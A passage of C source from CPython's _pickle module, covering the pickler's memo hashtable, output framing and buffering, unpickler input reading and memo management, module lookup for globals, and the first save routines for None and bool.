int fix_imports; /* Indicate whether Unpickler should fix
the name of globals pickled by Python 2.x. */
} UnpicklerObject;
typedef struct {
PyObject_HEAD
PicklerObject *pickler; /* Pickler whose memo table we're proxying. */
} PicklerMemoProxyObject;
typedef struct {
PyObject_HEAD
UnpicklerObject *unpickler;
} UnpicklerMemoProxyObject;
/* Forward declarations */
static int save(PicklerObject *, PyObject *, int);
static int save_reduce(PicklerObject *, PyObject *, PyObject *);
static PyTypeObject Pickler_Type;
static PyTypeObject Unpickler_Type;
#include "clinic/_pickle.c.h"
/*************************************************************************
A custom hashtable mapping void* to Python ints. This is used by the pickler
for memoization. Using a custom hashtable rather than PyDict allows us to skip
a bunch of unnecessary object creation. This makes a huge performance
difference. */
#define MT_MINSIZE 8
#define PERTURB_SHIFT 5
static PyMemoTable *
PyMemoTable_New(void)
{
PyMemoTable *memo = PyMem_MALLOC(sizeof(PyMemoTable));
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memo->mt_used = 0;
memo->mt_allocated = MT_MINSIZE;
memo->mt_mask = MT_MINSIZE - 1;
memo->mt_table = PyMem_MALLOC(MT_MINSIZE * sizeof(PyMemoEntry));
if (memo->mt_table == NULL) {
PyMem_FREE(memo);
PyErr_NoMemory();
return NULL;
}
memset(memo->mt_table, 0, MT_MINSIZE * sizeof(PyMemoEntry));
return memo;
}
static PyMemoTable *
PyMemoTable_Copy(PyMemoTable *self)
{
Py_ssize_t i;
PyMemoTable *new = PyMemoTable_New();
if (new == NULL)
return NULL;
new->mt_used = self->mt_used;
new->mt_allocated = self->mt_allocated;
new->mt_mask = self->mt_mask;
/* The table we get from _New() is probably smaller than we wanted.
Free it and allocate one that's the right size. */
PyMem_FREE(new->mt_table);
new->mt_table = PyMem_NEW(PyMemoEntry, self->mt_allocated);
if (new->mt_table == NULL) {
PyMem_FREE(new);
PyErr_NoMemory();
return NULL;
}
for (i = 0; i < self->mt_allocated; i++) {
Py_XINCREF(self->mt_table[i].me_key);
}
memcpy(new->mt_table, self->mt_table,
sizeof(PyMemoEntry) * self->mt_allocated);
return new;
}
static Py_ssize_t
PyMemoTable_Size(PyMemoTable *self)
{
return self->mt_used;
}
static int
PyMemoTable_Clear(PyMemoTable *self)
{
Py_ssize_t i = self->mt_allocated;
while (--i >= 0) {
Py_XDECREF(self->mt_table[i].me_key);
}
self->mt_used = 0;
memset(self->mt_table, 0, self->mt_allocated * sizeof(PyMemoEntry));
return 0;
}
static void
PyMemoTable_Del(PyMemoTable *self)
{
if (self == NULL)
return;
PyMemoTable_Clear(self);
PyMem_FREE(self->mt_table);
PyMem_FREE(self);
}
/* Since entries cannot be deleted from this hashtable, _PyMemoTable_Lookup()
can be considerably simpler than dictobject.c's lookdict(). */
static PyMemoEntry *
_PyMemoTable_Lookup(PyMemoTable *self, PyObject *key)
{
size_t i;
size_t perturb;
size_t mask = (size_t)self->mt_mask;
PyMemoEntry *table = self->mt_table;
PyMemoEntry *entry;
Py_hash_t hash = (Py_hash_t)key >> 3;
i = hash & mask;
entry = &table[i];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
for (perturb = hash; ; perturb >>= PERTURB_SHIFT) {
i = (i << 2) + i + perturb + 1;
entry = &table[i & mask];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
}
Py_UNREACHABLE();
}
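/* The probe sequence above, i = i*5 + perturb + 1 with perturb shifted right
by PERTURB_SHIFT each step, mirrors the open-addressing scheme of CPython's
dict in Objects/dictobject.c; because entries are never removed from the
memo table, the first NULL slot always terminates the search. */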
/* Returns -1 on failure, 0 on success. */
static int
_PyMemoTable_ResizeTable(PyMemoTable *self, Py_ssize_t min_size)
{
PyMemoEntry *oldtable = NULL;
PyMemoEntry *oldentry, *newentry;
Py_ssize_t new_size = MT_MINSIZE;
Py_ssize_t to_process;
assert(min_size > 0);
/* Find the smallest valid table size >= min_size. */
while (new_size < min_size && new_size > 0)
new_size <<= 1;
if (new_size <= 0) {
PyErr_NoMemory();
return -1;
}
/* new_size needs to be a power of two. */
assert((new_size & (new_size - 1)) == 0);
/* Allocate new table. */
oldtable = self->mt_table;
self->mt_table = PyMem_NEW(PyMemoEntry, new_size);
if (self->mt_table == NULL) {
self->mt_table = oldtable;
PyErr_NoMemory();
return -1;
}
self->mt_allocated = new_size;
self->mt_mask = new_size - 1;
memset(self->mt_table, 0, sizeof(PyMemoEntry) * new_size);
/* Copy entries from the old table. */
to_process = self->mt_used;
for (oldentry = oldtable; to_process > 0; oldentry++) {
if (oldentry->me_key != NULL) {
to_process--;
/* newentry is a pointer to a chunk of the new
mt_table, so we're setting the key:value pair
in-place. */
newentry = _PyMemoTable_Lookup(self, oldentry->me_key);
newentry->me_key = oldentry->me_key;
newentry->me_value = oldentry->me_value;
}
}
/* Deallocate the old table. */
PyMem_FREE(oldtable);
return 0;
}
/* Returns NULL on failure, a pointer to the value otherwise. */
static Py_ssize_t *
PyMemoTable_Get(PyMemoTable *self, PyObject *key)
{
PyMemoEntry *entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key == NULL)
return NULL;
return &entry->me_value;
}
/* Returns -1 on failure, 0 on success. */
static int
PyMemoTable_Set(PyMemoTable *self, PyObject *key, Py_ssize_t value)
{
PyMemoEntry *entry;
assert(key != NULL);
entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key != NULL) {
entry->me_value = value;
return 0;
}
Py_INCREF(key);
entry->me_key = key;
entry->me_value = value;
self->mt_used++;
/* If we added a key, we can safely resize. Otherwise just return!
* If used >= 2/3 size, adjust size. Normally, this quadruples the size.
*
* Quadrupling the size improves average table sparseness
* (reducing collisions) at the cost of some memory. It also halves
* the number of expensive resize operations in a growing memo table.
*
* Very large memo tables (over 50K items) use doubling instead.
* This may help applications with severe memory constraints.
*/
if (!(self->mt_used * 3 >= (self->mt_mask + 1) * 2))
return 0;
return _PyMemoTable_ResizeTable(self,
(self->mt_used > 50000 ? 2 : 4) * self->mt_used);
}
#undef MT_MINSIZE
#undef PERTURB_SHIFT
/*************************************************************************/
static int
_Pickler_ClearBuffer(PicklerObject *self)
{
Py_XSETREF(self->output_buffer,
PyBytes_FromStringAndSize(NULL, self->max_output_len));
if (self->output_buffer == NULL)
return -1;
self->output_len = 0;
self->frame_start = -1;
return 0;
}
static void
_write_size64(char *out, size_t value)
{
size_t i;
Py_BUILD_ASSERT(sizeof(size_t) <= 8);
for (i = 0; i < sizeof(size_t); i++) {
out[i] = (unsigned char)((value >> (8 * i)) & 0xff);
}
for (i = sizeof(size_t); i < 8; i++) {
out[i] = 0;
}
}
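/* Worked example: a committed frame carrying 300 bytes of pickle data gets
the 9-byte header FRAME, 0x2c, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 --
the FRAME opcode followed by the length 300 encoded as a 64-bit
little-endian integer by _write_size64(). */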
static int
_Pickler_CommitFrame(PicklerObject *self)
{
size_t frame_len;
char *qdata;
if (!self->framing || self->frame_start == -1)
return 0;
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
qdata = PyBytes_AS_STRING(self->output_buffer) + self->frame_start;
if (frame_len >= FRAME_SIZE_MIN) {
qdata[0] = FRAME;
_write_size64(qdata + 1, frame_len);
}
else {
memmove(qdata, qdata + FRAME_HEADER_SIZE, frame_len);
self->output_len -= FRAME_HEADER_SIZE;
}
self->frame_start = -1;
return 0;
}
static PyObject *
_Pickler_GetString(PicklerObject *self)
{
PyObject *output_buffer = self->output_buffer;
assert(self->output_buffer != NULL);
if (_Pickler_CommitFrame(self))
return NULL;
self->output_buffer = NULL;
/* Resize down to exact size */
if (_PyBytes_Resize(&output_buffer, self->output_len) < 0)
return NULL;
return output_buffer;
}
static int
_Pickler_FlushToFile(PicklerObject *self)
{
PyObject *output, *result;
assert(self->write != NULL);
/* This will commit the frame first */
output = _Pickler_GetString(self);
if (output == NULL)
return -1;
result = _Pickle_FastCall(self->write, output);
Py_XDECREF(result);
return (result == NULL) ? -1 : 0;
}
static int
_Pickler_OpcodeBoundary(PicklerObject *self)
{
Py_ssize_t frame_len;
if (!self->framing || self->frame_start == -1) {
return 0;
}
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
if (frame_len >= FRAME_SIZE_TARGET) {
if(_Pickler_CommitFrame(self)) {
return -1;
}
/* Flush the content of the committed frame to the underlying
* file and reuse the pickler buffer for the next frame so as
* to limit memory usage when dumping large complex objects to
* a file.
*
* self->write is NULL when called via dumps.
*/
if (self->write != NULL) {
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
}
return 0;
}
static Py_ssize_t
_Pickler_Write(PicklerObject *self, const char *s, Py_ssize_t data_len)
{
Py_ssize_t i, n, required;
char *buffer;
int need_new_frame;
assert(s != NULL);
need_new_frame = (self->framing && self->frame_start == -1);
if (need_new_frame)
n = data_len + FRAME_HEADER_SIZE;
else
n = data_len;
required = self->output_len + n;
if (required > self->max_output_len) {
/* Make place in buffer for the pickle chunk */
if (self->output_len >= PY_SSIZE_T_MAX / 2 - n) {
PyErr_NoMemory();
return -1;
}
self->max_output_len = (self->output_len + n) / 2 * 3;
if (_PyBytes_Resize(&self->output_buffer, self->max_output_len) < 0)
return -1;
}
buffer = PyBytes_AS_STRING(self->output_buffer);
if (need_new_frame) {
/* Setup new frame */
Py_ssize_t frame_start = self->output_len;
self->frame_start = frame_start;
for (i = 0; i < FRAME_HEADER_SIZE; i++) {
/* Write an invalid value, for debugging */
buffer[frame_start + i] = 0xFE;
}
self->output_len += FRAME_HEADER_SIZE;
}
if (data_len < 8) {
/* This is faster than memcpy when the string is short. */
for (i = 0; i < data_len; i++) {
buffer[self->output_len + i] = s[i];
}
}
else {
memcpy(buffer + self->output_len, s, data_len);
}
self->output_len += data_len;
return data_len;
}
static PicklerObject *
_Pickler_New(void)
{
PicklerObject *self;
self = PyObject_GC_New(PicklerObject, &Pickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->dispatch_table = NULL;
self->write = NULL;
self->proto = 0;
self->bin = 0;
self->framing = 0;
self->frame_start = -1;
self->fast = 0;
self->fast_nesting = 0;
self->fix_imports = 0;
self->fast_memo = NULL;
self->max_output_len = WRITE_BUF_SIZE;
self->output_len = 0;
self->memo = PyMemoTable_New();
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->memo == NULL || self->output_buffer == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
static int
_Pickler_SetProtocol(PicklerObject *self, PyObject *protocol, int fix_imports)
{
long proto;
if (protocol == NULL || protocol == Py_None) {
proto = DEFAULT_PROTOCOL;
}
else {
proto = PyLong_AsLong(protocol);
if (proto < 0) {
if (proto == -1 && PyErr_Occurred())
return -1;
proto = HIGHEST_PROTOCOL;
}
else if (proto > HIGHEST_PROTOCOL) {
PyErr_Format(PyExc_ValueError, "pickle protocol must be <= %d",
HIGHEST_PROTOCOL);
return -1;
}
}
self->proto = (int)proto;
self->bin = proto > 0;
self->fix_imports = fix_imports && proto < 3;
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Pickler_SetOutputStream(PicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(write);
assert(file != NULL);
if (_PyObject_LookupAttrId(file, &PyId_write, &self->write) < 0) {
return -1;
}
if (self->write == NULL) {
PyErr_SetString(PyExc_TypeError,
"file must have a 'write' attribute");
return -1;
}
return 0;
}
/* Returns the size of the input on success, -1 on failure. This takes its
own reference to `input`. */
static Py_ssize_t
_Unpickler_SetStringInput(UnpicklerObject *self, PyObject *input)
{
if (self->buffer.buf != NULL)
PyBuffer_Release(&self->buffer);
if (PyObject_GetBuffer(input, &self->buffer, PyBUF_CONTIG_RO) < 0)
return -1;
self->input_buffer = self->buffer.buf;
self->input_len = self->buffer.len;
self->next_read_idx = 0;
self->prefetched_idx = self->input_len;
return self->input_len;
}
static int
bad_readline(void)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "pickle data was truncated");
return -1;
}
static int
_Unpickler_SkipConsumed(UnpicklerObject *self)
{
Py_ssize_t consumed;
PyObject *r;
consumed = self->next_read_idx - self->prefetched_idx;
if (consumed <= 0)
return 0;
assert(self->peek); /* otherwise we did something wrong */
/* This makes a useless copy... */
r = PyObject_CallFunction(self->read, "n", consumed);
if (r == NULL)
return -1;
Py_DECREF(r);
self->prefetched_idx = self->next_read_idx;
return 0;
}
static const Py_ssize_t READ_WHOLE_LINE = -1;
/* If reading from a file, we need to only pull the bytes we need, since there
may be multiple pickle objects arranged contiguously in the same input
buffer.
If `n` is READ_WHOLE_LINE, read a whole line. Otherwise, read up to `n`
bytes from the input stream/buffer.
Update the unpickler's input buffer with the newly-read data. Returns -1 on
failure; on success, returns the number of bytes read from the file.
On success, self->input_len will be 0; this is intentional so that when
unpickling from a file, the "we've run out of data" code paths will trigger,
causing the Unpickler to go back to the file for more data. Use the returned
size to tell you how much data you can process. */
static Py_ssize_t
_Unpickler_ReadFromFile(UnpicklerObject *self, Py_ssize_t n)
{
PyObject *data;
Py_ssize_t read_size;
assert(self->read != NULL);
if (_Unpickler_SkipConsumed(self) < 0)
return -1;
if (n == READ_WHOLE_LINE) {
data = _PyObject_CallNoArg(self->readline);
}
else {
PyObject *len;
/* Prefetch some data without advancing the file pointer, if possible */
if (self->peek && n < PREFETCH) {
len = PyLong_FromSsize_t(PREFETCH);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->peek, len);
if (data == NULL) {
if (!PyErr_ExceptionMatches(PyExc_NotImplementedError))
return -1;
/* peek() is probably not supported by the given file object */
PyErr_Clear();
Py_CLEAR(self->peek);
}
else {
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
self->prefetched_idx = 0;
if (n <= read_size)
return n;
}
}
len = PyLong_FromSsize_t(n);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->read, len);
}
if (data == NULL)
return -1;
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
return read_size;
}
/* Don't call it directly: use _Unpickler_Read() */
static Py_ssize_t
_Unpickler_ReadImpl(UnpicklerObject *self, char **s, Py_ssize_t n)
{
Py_ssize_t num_read;
*s = NULL;
if (self->next_read_idx > PY_SSIZE_T_MAX - n) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"read would overflow (invalid bytecode)");
return -1;
}
/* This case is handled by the _Unpickler_Read() macro for efficiency */
assert(self->next_read_idx + n > self->input_len);
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, n);
if (num_read < 0)
return -1;
if (num_read < n)
return bad_readline();
*s = self->input_buffer;
self->next_read_idx = n;
return n;
}
/* Read `n` bytes from the unpickler's data source, storing the result in `*s`.
This should be used for all data reads, rather than accessing the unpickler's
input buffer directly. This method deals correctly with reading from input
streams, which the input buffer doesn't deal with.
Note that when reading from a file-like object, self->next_read_idx won't
be updated (it should remain at 0 for the entire unpickling process). You
should use this function's return value to know how many bytes you can
consume.
Returns -1 (with an exception set) on failure. On success, return the
number of chars read. */
#define _Unpickler_Read(self, s, n) \
(((n) <= (self)->input_len - (self)->next_read_idx) \
? (*(s) = (self)->input_buffer + (self)->next_read_idx, \
(self)->next_read_idx += (n), \
(n)) \
: _Unpickler_ReadImpl(self, (s), (n)))
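/* Typical call pattern (a minimal sketch, not copied from a specific caller
in this file):
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
On success, s points at 4 readable bytes inside the unpickler's input
buffer, and next_read_idx has already been advanced past them. */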
static Py_ssize_t
_Unpickler_CopyLine(UnpicklerObject *self, char *line, Py_ssize_t len,
char **result)
{
char *input_line = PyMem_Realloc(self->input_line, len + 1);
if (input_line == NULL) {
PyErr_NoMemory();
return -1;
}
memcpy(input_line, line, len);
input_line[len] = '\0';
self->input_line = input_line;
*result = self->input_line;
return len;
}
/* Read a line from the input stream/buffer. If we run off the end of the input
before hitting \n, raise an error.
Returns the number of chars read, or -1 on failure. */
static Py_ssize_t
_Unpickler_Readline(UnpicklerObject *self, char **result)
{
Py_ssize_t i, num_read;
for (i = self->next_read_idx; i < self->input_len; i++) {
if (self->input_buffer[i] == '\n') {
char *line_start = self->input_buffer + self->next_read_idx;
num_read = i - self->next_read_idx + 1;
self->next_read_idx = i + 1;
return _Unpickler_CopyLine(self, line_start, num_read, result);
}
}
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, READ_WHOLE_LINE);
if (num_read < 0)
return -1;
if (num_read == 0 || self->input_buffer[num_read - 1] != '\n')
return bad_readline();
self->next_read_idx = num_read;
return _Unpickler_CopyLine(self, self->input_buffer, num_read, result);
}
/* Returns -1 (with an exception set) on failure, 0 on success. The memo array
will be modified in place. */
static int
_Unpickler_ResizeMemoList(UnpicklerObject *self, Py_ssize_t new_size)
{
Py_ssize_t i;
assert(new_size > self->memo_size);
PyObject **memo_new = self->memo;
PyMem_RESIZE(memo_new, PyObject *, new_size);
if (memo_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->memo = memo_new;
for (i = self->memo_size; i < new_size; i++)
self->memo[i] = NULL;
self->memo_size = new_size;
return 0;
}
/* Returns NULL if idx is out of bounds. */
static PyObject *
_Unpickler_MemoGet(UnpicklerObject *self, Py_ssize_t idx)
{
if (idx < 0 || idx >= self->memo_size)
return NULL;
return self->memo[idx];
}
/* Returns -1 (with an exception set) on failure, 0 on success.
This takes its own reference to `value`. */
static int
_Unpickler_MemoPut(UnpicklerObject *self, Py_ssize_t idx, PyObject *value)
{
PyObject *old_item;
if (idx >= self->memo_size) {
if (_Unpickler_ResizeMemoList(self, idx * 2) < 0)
return -1;
assert(idx < self->memo_size);
}
Py_INCREF(value);
old_item = self->memo[idx];
self->memo[idx] = value;
if (old_item != NULL) {
Py_DECREF(old_item);
}
else {
self->memo_len++;
}
return 0;
}
static PyObject **
_Unpickler_NewMemo(Py_ssize_t new_size)
{
PyObject **memo = PyMem_NEW(PyObject *, new_size);
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memset(memo, 0, new_size * sizeof(PyObject *));
return memo;
}
/* Free the unpickler's memo, taking care to decref any items left in it. */
static void
_Unpickler_MemoCleanup(UnpicklerObject *self)
{
Py_ssize_t i;
PyObject **memo = self->memo;
if (self->memo == NULL)
return;
self->memo = NULL;
i = self->memo_size;
while (--i >= 0) {
Py_XDECREF(memo[i]);
}
PyMem_FREE(memo);
}
static UnpicklerObject *
_Unpickler_New(void)
{
UnpicklerObject *self;
self = PyObject_GC_New(UnpicklerObject, &Unpickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->input_buffer = NULL;
self->input_line = NULL;
self->input_len = 0;
self->next_read_idx = 0;
self->prefetched_idx = 0;
self->read = NULL;
self->readline = NULL;
self->peek = NULL;
self->encoding = NULL;
self->errors = NULL;
self->marks = NULL;
self->num_marks = 0;
self->marks_size = 0;
self->proto = 0;
self->fix_imports = 0;
memset(&self->buffer, 0, sizeof(Py_buffer));
self->memo_size = 32;
self->memo_len = 0;
self->memo = _Unpickler_NewMemo(self->memo_size);
self->stack = (Pdata *)Pdata_New();
if (self->memo == NULL || self->stack == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Unpickler. */
static int
_Unpickler_SetInputStream(UnpicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(peek);
_Py_IDENTIFIER(read);
_Py_IDENTIFIER(readline);
if (_PyObject_LookupAttrId(file, &PyId_peek, &self->peek) < 0) {
return -1;
}
(void)_PyObject_LookupAttrId(file, &PyId_read, &self->read);
(void)_PyObject_LookupAttrId(file, &PyId_readline, &self->readline);
if (self->readline == NULL || self->read == NULL) {
if (!PyErr_Occurred()) {
PyErr_SetString(PyExc_TypeError,
"file must have 'read' and 'readline' attributes");
}
Py_CLEAR(self->read);
Py_CLEAR(self->readline);
Py_CLEAR(self->peek);
return -1;
}
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Unpickler. */
static int
_Unpickler_SetInputEncoding(UnpicklerObject *self,
const char *encoding,
const char *errors)
{
if (encoding == NULL)
encoding = "ASCII";
if (errors == NULL)
errors = "strict";
self->encoding = _PyMem_Strdup(encoding);
self->errors = _PyMem_Strdup(errors);
if (self->encoding == NULL || self->errors == NULL) {
PyErr_NoMemory();
return -1;
}
return 0;
}
/* Generate a GET opcode for an object stored in the memo. */
static int
memo_get(PicklerObject *self, PyObject *key)
{
Py_ssize_t *value;
char pdata[30];
Py_ssize_t len;
value = PyMemoTable_Get(self->memo, key);
if (value == NULL) {
PyErr_SetObject(PyExc_KeyError, key);
return -1;
}
if (!self->bin) {
pdata[0] = GET;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", *value);
len = strlen(pdata);
}
else {
if (*value < 256) {
pdata[0] = BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
len = 2;
}
else if ((size_t)*value <= 0xffffffffUL) {
pdata[0] = LONG_BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
pdata[2] = (unsigned char)((*value >> 8) & 0xff);
pdata[3] = (unsigned char)((*value >> 16) & 0xff);
pdata[4] = (unsigned char)((*value >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINGET");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* Store an object in the memo, assign it a new unique ID based on the number
of objects currently stored in the memo and generate a PUT opcode. */
static int
memo_put(PicklerObject *self, PyObject *obj)
{
char pdata[30];
Py_ssize_t len;
Py_ssize_t idx;
const char memoize_op = MEMOIZE;
if (self->fast)
return 0;
idx = PyMemoTable_Size(self->memo);
if (PyMemoTable_Set(self->memo, obj, idx) < 0)
return -1;
if (self->proto >= 4) {
if (_Pickler_Write(self, &memoize_op, 1) < 0)
return -1;
return 0;
}
else if (!self->bin) {
pdata[0] = PUT;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", idx);
len = strlen(pdata);
}
else {
if (idx < 256) {
pdata[0] = BINPUT;
pdata[1] = (unsigned char)idx;
len = 2;
}
else if ((size_t)idx <= 0xffffffffUL) {
pdata[0] = LONG_BINPUT;
pdata[1] = (unsigned char)(idx & 0xff);
pdata[2] = (unsigned char)((idx >> 8) & 0xff);
pdata[3] = (unsigned char)((idx >> 16) & 0xff);
pdata[4] = (unsigned char)((idx >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINPUT");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
static PyObject *
get_dotted_path(PyObject *obj, PyObject *name)
{
_Py_static_string(PyId_dot, ".");
PyObject *dotted_path;
Py_ssize_t i, n;
dotted_path = PyUnicode_Split(name, _PyUnicode_FromId(&PyId_dot), -1);
if (dotted_path == NULL)
return NULL;
n = PyList_GET_SIZE(dotted_path);
assert(n >= 1);
for (i = 0; i < n; i++) {
PyObject *subpath = PyList_GET_ITEM(dotted_path, i);
if (_PyUnicode_EqualToASCIIString(subpath, "<locals>")) {
if (obj == NULL)
PyErr_Format(PyExc_AttributeError,
"Can't pickle local object %R", name);
else
PyErr_Format(PyExc_AttributeError,
"Can't pickle local attribute %R on %R", name, obj);
Py_DECREF(dotted_path);
return NULL;
}
}
return dotted_path;
}
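/* Follow the attribute names produced by get_dotted_path() starting from
obj. Returns a new reference to the final attribute, or NULL (not
necessarily with an exception set) if any lookup fails. If pparent is
non-NULL, it receives a new reference to the next-to-last object. */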
static PyObject *
get_deep_attribute(PyObject *obj, PyObject *names, PyObject **pparent)
{
Py_ssize_t i, n;
PyObject *parent = NULL;
assert(PyList_CheckExact(names));
Py_INCREF(obj);
n = PyList_GET_SIZE(names);
for (i = 0; i < n; i++) {
PyObject *name = PyList_GET_ITEM(names, i);
Py_XDECREF(parent);
parent = obj;
(void)_PyObject_LookupAttr(parent, name, &obj);
if (obj == NULL) {
Py_DECREF(parent);
return NULL;
}
}
if (pparent != NULL)
*pparent = parent;
else
Py_XDECREF(parent);
return obj;
}
static PyObject *
getattribute(PyObject *obj, PyObject *name, int allow_qualname)
{
PyObject *dotted_path, *attr;
if (allow_qualname) {
dotted_path = get_dotted_path(obj, name);
if (dotted_path == NULL)
return NULL;
attr = get_deep_attribute(obj, dotted_path, NULL);
Py_DECREF(dotted_path);
}
else {
(void)_PyObject_LookupAttr(obj, name, &attr);
}
if (attr == NULL && !PyErr_Occurred()) {
PyErr_Format(PyExc_AttributeError,
"Can't get attribute %R on %R", name, obj);
}
return attr;
}
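/* Helper for whichmodule(): return 0 if resolving dotted_path inside module
yields exactly the object being pickled, and -1 otherwise (modules that
are None or named "__main__" are skipped on purpose). */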
static int
_checkmodule(PyObject *module_name, PyObject *module,
PyObject *global, PyObject *dotted_path)
{
if (module == Py_None) {
return -1;
}
if (PyUnicode_Check(module_name) &&
_PyUnicode_EqualToASCIIString(module_name, "__main__")) {
return -1;
}
PyObject *candidate = get_deep_attribute(module, dotted_path, NULL);
if (candidate == NULL) {
return -1;
}
if (candidate != global) {
Py_DECREF(candidate);
return -1;
}
Py_DECREF(candidate);
return 0;
}
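/* Determine the name of the module that defines global: prefer the object's
own __module__ attribute; otherwise scan sys.modules for a module whose
dotted_path resolves to the same object, falling back to "__main__". */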
static PyObject *
whichmodule(PyObject *global, PyObject *dotted_path)
{
PyObject *module_name;
PyObject *module = NULL;
Py_ssize_t i;
PyObject *modules;
_Py_IDENTIFIER(__module__);
_Py_IDENTIFIER(modules);
_Py_IDENTIFIER(__main__);
if (_PyObject_LookupAttrId(global, &PyId___module__, &module_name) < 0) {
return NULL;
}
if (module_name) {
/* In some rare cases (e.g., bound methods of extension types),
__module__ can be None. If it is so, then search sys.modules for
the module of global. */
if (module_name != Py_None)
return module_name;
Py_CLEAR(module_name);
}
assert(module_name == NULL);
/* Fallback on walking sys.modules */
modules = _PySys_GetObjectId(&PyId_modules);
if (modules == NULL) {
PyErr_SetString(PyExc_RuntimeError, "unable to get sys.modules");
return NULL;
}
if (PyDict_CheckExact(modules)) {
i = 0;
while (PyDict_Next(modules, &i, &module_name, &module)) {
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_INCREF(module_name);
return module_name;
}
if (PyErr_Occurred()) {
return NULL;
}
}
}
else {
PyObject *iterator = PyObject_GetIter(modules);
if (iterator == NULL) {
return NULL;
}
while ((module_name = PyIter_Next(iterator))) {
module = PyObject_GetItem(modules, module_name);
if (module == NULL) {
Py_DECREF(module_name);
Py_DECREF(iterator);
return NULL;
}
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_DECREF(module);
Py_DECREF(iterator);
return module_name;
}
Py_DECREF(module);
Py_DECREF(module_name);
if (PyErr_Occurred()) {
Py_DECREF(iterator);
return NULL;
}
}
Py_DECREF(iterator);
}
/* If no module is found, use __main__. */
module_name = _PyUnicode_FromId(&PyId___main__);
Py_XINCREF(module_name);
return module_name;
}
/* fast_save_enter() and fast_save_leave() are guards against recursive
objects when Pickler is used with the "fast mode" (i.e., with object
memoization disabled). If the nesting of a list or dict object exceeds
FAST_NESTING_LIMIT, these guards will start keeping an internal
reference to the seen list or dict objects and check whether these objects
are recursive. These are not strictly necessary, since save() has a
hard-coded recursion limit, but they give a nicer error message than the
typical RuntimeError. */
static int
fast_save_enter(PicklerObject *self, PyObject *obj)
{
/* if fast_nesting < 0, we're doing an error exit. */
if (++self->fast_nesting >= FAST_NESTING_LIMIT) {
PyObject *key = NULL;
if (self->fast_memo == NULL) {
self->fast_memo = PyDict_New();
if (self->fast_memo == NULL) {
self->fast_nesting = -1;
return 0;
}
}
key = PyLong_FromVoidPtr(obj);
if (key == NULL) {
self->fast_nesting = -1;
return 0;
}
if (PyDict_GetItemWithError(self->fast_memo, key)) {
Py_DECREF(key);
PyErr_Format(PyExc_ValueError,
"fast mode: can't pickle cyclic objects "
"including object type %.200s at %p",
obj->ob_type->tp_name, obj);
self->fast_nesting = -1;
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
if (PyDict_SetItem(self->fast_memo, key, Py_None) < 0) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
fast_save_leave(PicklerObject *self, PyObject *obj)
{
if (self->fast_nesting-- >= FAST_NESTING_LIMIT) {
PyObject *key = PyLong_FromVoidPtr(obj);
if (key == NULL)
return 0;
if (PyDict_DelItem(self->fast_memo, key) < 0) {
Py_DECREF(key);
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
save_none(PicklerObject *self, PyObject *obj)
{
const char none_op = NONE;
if (_Pickler_Write(self, &none_op, 1) < 0)
return -1;
return 0;
}
static int
save_bool(PicklerObject *self, PyObject *obj)
{
if (self->proto >= 2) {
const char bool_op = (obj == Py_True) ? NEWTRUE : NEWFALSE;
if (_Pickler_Write(self, &bool_op, 1) < 0)
return -1;
}
else {
/* These aren't opcodes -- they're ways to pickle bools before protocol 2
* so that unpicklers written before bools were introduced unpickle them
* as ints, but unpicklers after can recognize that bools were intended.
* Note that protocol 2 added direct ways to pickle bools.
*/
const char *bool_str = (obj == Py_True) ? "I01\n" : "I00\n";
if (_Pickler_Write(self, bool_str, strlen(bool_str)) < 0)
return -1;
}
return 0;
}
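/* Pickle an int. Values that fit in a signed 32-bit integer are written
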